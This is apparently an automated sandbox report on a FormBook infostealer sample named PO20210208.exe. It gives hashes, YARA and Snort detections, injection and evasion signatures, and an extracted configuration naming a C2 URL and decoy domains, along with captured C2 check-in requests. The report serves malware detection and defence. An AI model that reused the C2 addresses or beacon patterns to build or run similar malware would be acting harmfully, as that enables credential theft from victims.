Windows Analysis Report PO20210208.exe

Overview

General Information

Sample Name:	PO20210208.exe
Analysis ID:	458732
MD5:	453333db091bf0aa1b44de50ee557b82
SHA1:	2fc782c51a566dc11e47cb27dfaaeac4def8ce84
SHA256:	ac99c0c414eba6afadb236077dd77f506c7f316511a72b70a0f0f630f9b5c416
Tags:	exeFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Uses schtasks.exe or at.exe to add and modify task schedules

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000011.00000002.536617953.0000000000E80000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.drtimgood.com/kd8k/"], "decoy": ["khjbhqpha.com", "edukasiinvestor.com", "jokysun.com", "remnantfund.com", "yolevin.com", "namshicontrole2.com", "manayikorean.site", "ysy.mobi", "netconzulting.com", "deeparchivesvpn.com", "kiemmieng.com", "guptavegetables.com", "walihamidullahthetraveller.com", "littlehamptonacres.com", "pause-to-simplify.com", "famehound.com", "artthatsells.net", "hickorymontessori.com", "enjoyitpestfree.com", "linuxliang.com", "toorden.com", "vspbavjm.asia", "therightref.com", "springfibre.net", "tumorpedia.com", "ppark.tech", "perfectohydrodrill.com", "vivelaprovince.com", "elevatedfromwithin.com", "vidudio.com", "acostaportal.com", "newmillenniumwheels.com", "emidhotels.com", "teletrabajadesdelaplaya.com", "audrunner.com", "novaraweb.net", "tbookslide.com", "maskuni.com", "ezolimo-corporation.com", "educatoredwards.com", "ammosquare.com", "safeyourcity.com", "trucksrrollinginternational.com", "yaqinuo-beauty.com", "greatthingsforme.com", "cidrobosas.com", "asesoriamentai.com", "paradisemodafemenina.com", "assuredoutcomesllc.com", "zs597.com", "impactpittsburg.com", "argusmessaging.com", "marketingconjoha.com", "applite-autodesbloqueio.com", "extop.net", "greatplacetoliveforseniors.com", "repcitylove.com", "inweli.com", "qls126-vh.com", "lansdaledentists.com", "lmmry.com", "domaine-dezat.wine", "her-haircollection.com", "catoseo.com"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\jzJlVLOvvNOn.exe

ReversingLabs: Detection: 46%

Multi AV Scanner detection for submitted file

Source: PO20210208.exe	Virustotal: Detection: 30%			Perma Link
Source: PO20210208.exe	ReversingLabs: Detection: 46%

Yara detected FormBook

Source: Yara match	File source: 10.2.PO20210208.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.PO20210208.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.536617953.0000000000E80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.536570709.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.373023982.0000000001C10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.536321895.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.371759011.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.372992158.0000000001BE0000.00000040.00000001.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\jzJlVLOvvNOn.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PO20210208.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 10.2.PO20210208.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Source: PO20210208.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: PO20210208.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: msiexec.pdb source: PO20210208.exe, 0000000A.00000002.373073781.0000000001C60000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.334096334.000000000DFF0000.00000002.00000001.sdmp
Source:	Binary string: msiexec.pdbGCTL source: PO20210208.exe, 0000000A.00000002.373073781.0000000001C60000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: PO20210208.exe, 0000000A.00000002.372348490.00000000018B0000.00000040.00000001.sdmp, msiexec.exe, 00000011.00000002.538865356.0000000004E1F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: PO20210208.exe, 0000000A.00000002.372348490.00000000018B0000.00000040.00000001.sdmp, msiexec.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.334096334.000000000DFF0000.00000002.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 4x nop then pop edi	10_2_00416C90
Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 4x nop then pop edi	10_2_00416CA0
Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 4x nop then pop edi	10_2_00417D79
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then pop edi	17_2_00B26CA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then pop edi	17_2_00B26C90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then pop edi	17_2_00B27D79

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49751 -> 199.59.242.153:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49751 -> 199.59.242.153:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49751 -> 199.59.242.153:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.drtimgood.com/kd8k/

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /kd8k/?k484cP=6lXxUBgPFXV4ht&FN9t7=Aecc1C2lq3KIOk0Z5e9GHdHOzGpcwGJNxdz75+SI1+BGrXagTsSPYgmle4+aia3bzkQ1M3Kxow== HTTP/1.1Host: www.drtimgood.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /kd8k/?FN9t7=pHASxN/zB2s8y7031b2M6UpombzKK7jcls/pLxeKoPwZAZ9UGIoJwDMFpIJDyyQaamJqeGG8IQ==&k484cP=6lXxUBgPFXV4ht HTTP/1.1Host: www.hickorymontessori.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 199.59.242.153 199.59.242.153

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: BODIS-NJUS BODIS-NJUS
Source: Joe Sandbox View	ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS

Source: global traffic	HTTP traffic detected: GET /kd8k/?k484cP=6lXxUBgPFXV4ht&FN9t7=Aecc1C2lq3KIOk0Z5e9GHdHOzGpcwGJNxdz75+SI1+BGrXagTsSPYgmle4+aia3bzkQ1M3Kxow== HTTP/1.1Host: www.drtimgood.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /kd8k/?FN9t7=pHASxN/zB2s8y7031b2M6UpombzKK7jcls/pLxeKoPwZAZ9UGIoJwDMFpIJDyyQaamJqeGG8IQ==&k484cP=6lXxUBgPFXV4ht HTTP/1.1Host: www.hickorymontessori.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.drtimgood.com

Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000B.00000000.326272082.0000000006840000.00000004.00000001.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000000B.00000000.332488061.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 10.2.PO20210208.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.PO20210208.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.536617953.0000000000E80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.536570709.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.373023982.0000000001C10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.536321895.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.371759011.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.372992158.0000000001BE0000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 10.2.PO20210208.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.PO20210208.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.PO20210208.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.PO20210208.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.536617953.0000000000E80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.536617953.0000000000E80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.536570709.0000000000E40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.536570709.0000000000E40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.373023982.0000000001C10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.373023982.0000000001C10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.536321895.0000000000B10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.536321895.0000000000B10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.371759011.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.371759011.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.372992158.0000000001BE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.372992158.0000000001BE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Contains functionality to call native functions

Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 10_2_00419D60 NtCreateFile,	10_2_00419D60
Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 10_2_00419E10 NtReadFile,	10_2_00419E10
Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 10_2_00419E90 NtClose,	10_2_00419E90
Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 10_2_00419F40 NtAllocateVirtualMemory,	10_2_00419F40
Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 10_2_00419D5A NtCreateFile,	10_2_00419D5A
Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 10_2_00419E0B NtReadFile,	10_2_00419E0B
Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 10_2_00419E8B NtClose,	10_2_00419E8B
Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 10_2_00419F3A NtAllocateVirtualMemory,	10_2_00419F3A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D69840 NtDelayExecution,LdrInitializeThunk,	17_2_04D69840
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D69860 NtQuerySystemInformation,LdrInitializeThunk,	17_2_04D69860
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D695D0 NtClose,LdrInitializeThunk,	17_2_04D695D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D699A0 NtCreateSection,LdrInitializeThunk,	17_2_04D699A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D69540 NtReadFile,LdrInitializeThunk,	17_2_04D69540
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D69910 NtAdjustPrivilegesToken,LdrInitializeThunk,	17_2_04D69910
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D696D0 NtCreateKey,LdrInitializeThunk,	17_2_04D696D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D696E0 NtFreeVirtualMemory,LdrInitializeThunk,	17_2_04D696E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D69650 NtQueryValueKey,LdrInitializeThunk,	17_2_04D69650
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D69A50 NtCreateFile,LdrInitializeThunk,	17_2_04D69A50
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D69660 NtAllocateVirtualMemory,LdrInitializeThunk,	17_2_04D69660
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D69FE0 NtCreateMutant,LdrInitializeThunk,	17_2_04D69FE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D69780 NtMapViewOfSection,LdrInitializeThunk,	17_2_04D69780
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D69710 NtQueryInformationToken,LdrInitializeThunk,	17_2_04D69710
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D698F0 NtReadVirtualMemory,	17_2_04D698F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D698A0 NtWriteVirtualMemory,	17_2_04D698A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D6B040 NtSuspendThread,	17_2_04D6B040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D69820 NtEnumerateKey,	17_2_04D69820
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D699D0 NtCreateProcessEx,	17_2_04D699D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D695F0 NtQueryInformationFile,	17_2_04D695F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D69950 NtQueueApcThread,	17_2_04D69950
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D69560 NtWriteFile,	17_2_04D69560
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D6AD30 NtSetContextThread,	17_2_04D6AD30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D69520 NtWaitForSingleObject,	17_2_04D69520
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D69A80 NtOpenDirectoryObject,	17_2_04D69A80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D69670 NtQueryInformationProcess,	17_2_04D69670
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D69610 NtEnumerateValueKey,	17_2_04D69610
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D69A10 NtQuerySection,	17_2_04D69A10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D69A00 NtProtectVirtualMemory,	17_2_04D69A00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D69A20 NtResumeThread,	17_2_04D69A20
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D6A3B0 NtGetContextThread,	17_2_04D6A3B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D697A0 NtUnmapViewOfSection,	17_2_04D697A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D69770 NtSetInformationFile,	17_2_04D69770
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D6A770 NtOpenThread,	17_2_04D6A770
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D69760 NtOpenProcess,	17_2_04D69760
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D6A710 NtOpenProcessToken,	17_2_04D6A710
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D69B00 NtSetValueKey,	17_2_04D69B00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D69730 NtQueryVirtualMemory,	17_2_04D69730
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_00B29D60 NtCreateFile,	17_2_00B29D60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_00B29E90 NtClose,	17_2_00B29E90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_00B29E10 NtReadFile,	17_2_00B29E10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_00B29F40 NtAllocateVirtualMemory,	17_2_00B29F40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_00B29D5A NtCreateFile,	17_2_00B29D5A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_00B29E8B NtClose,	17_2_00B29E8B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_00B29E0B NtReadFile,	17_2_00B29E0B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_00B29F3A NtAllocateVirtualMemory,	17_2_00B29F3A

Detected potential crypto function

Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 10_2_00401030	10_2_00401030
Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 10_2_0041D103	10_2_0041D103
Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 10_2_0041EACA	10_2_0041EACA
Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 10_2_0041D4B3	10_2_0041D4B3
Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 10_2_0041E5DF	10_2_0041E5DF
Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 10_2_0041E5E2	10_2_0041E5E2
Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 10_2_00402D90	10_2_00402D90
Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 10_2_00409E40	10_2_00409E40
Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 10_2_0041D7F7	10_2_0041D7F7
Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 10_2_00402FB0	10_2_00402FB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D3B090	17_2_04D3B090
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D3841F	17_2_04D3841F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04DE1002	17_2_04DE1002
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D3D5E0	17_2_04D3D5E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D52581	17_2_04D52581
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04DF1D55	17_2_04DF1D55
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D2F900	17_2_04D2F900
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D20D20	17_2_04D20D20
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D44120	17_2_04D44120
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D46E30	17_2_04D46E30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D5EBB0	17_2_04D5EBB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_00B2D103	17_2_00B2D103
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_00B2EACA	17_2_00B2EACA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_00B2D4B3	17_2_00B2D4B3
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_00B12D90	17_2_00B12D90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_00B2E5E2	17_2_00B2E5E2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_00B2E5DF	17_2_00B2E5DF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_00B19E40	17_2_00B19E40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_00B12FB0	17_2_00B12FB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_00B2D7F7	17_2_00B2D7F7

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: String function: 04D2B150 appears 32 times

PE file contains strange resources

Source: PO20210208.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: PO20210208.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: PO20210208.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jzJlVLOvvNOn.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jzJlVLOvvNOn.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jzJlVLOvvNOn.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Source: PO20210208.exe, 00000000.00000000.270779523.0000000000766000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameFormatterTypeSty.exe< vs PO20210208.exe
Source: PO20210208.exe, 0000000A.00000002.373100026.0000000001C6F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamemsiexec.exeX vs PO20210208.exe
Source: PO20210208.exe, 0000000A.00000002.371961483.0000000000F06000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameFormatterTypeSty.exe< vs PO20210208.exe
Source: PO20210208.exe, 0000000A.00000002.372895140.0000000001B5F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO20210208.exe
Source: PO20210208.exe	Binary or memory string: OriginalFilenameFormatterTypeSty.exe< vs PO20210208.exe

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\msiexec.exe

Section loaded: sfc.dll

Source: 10.2.PO20210208.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.PO20210208.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.PO20210208.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.PO20210208.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
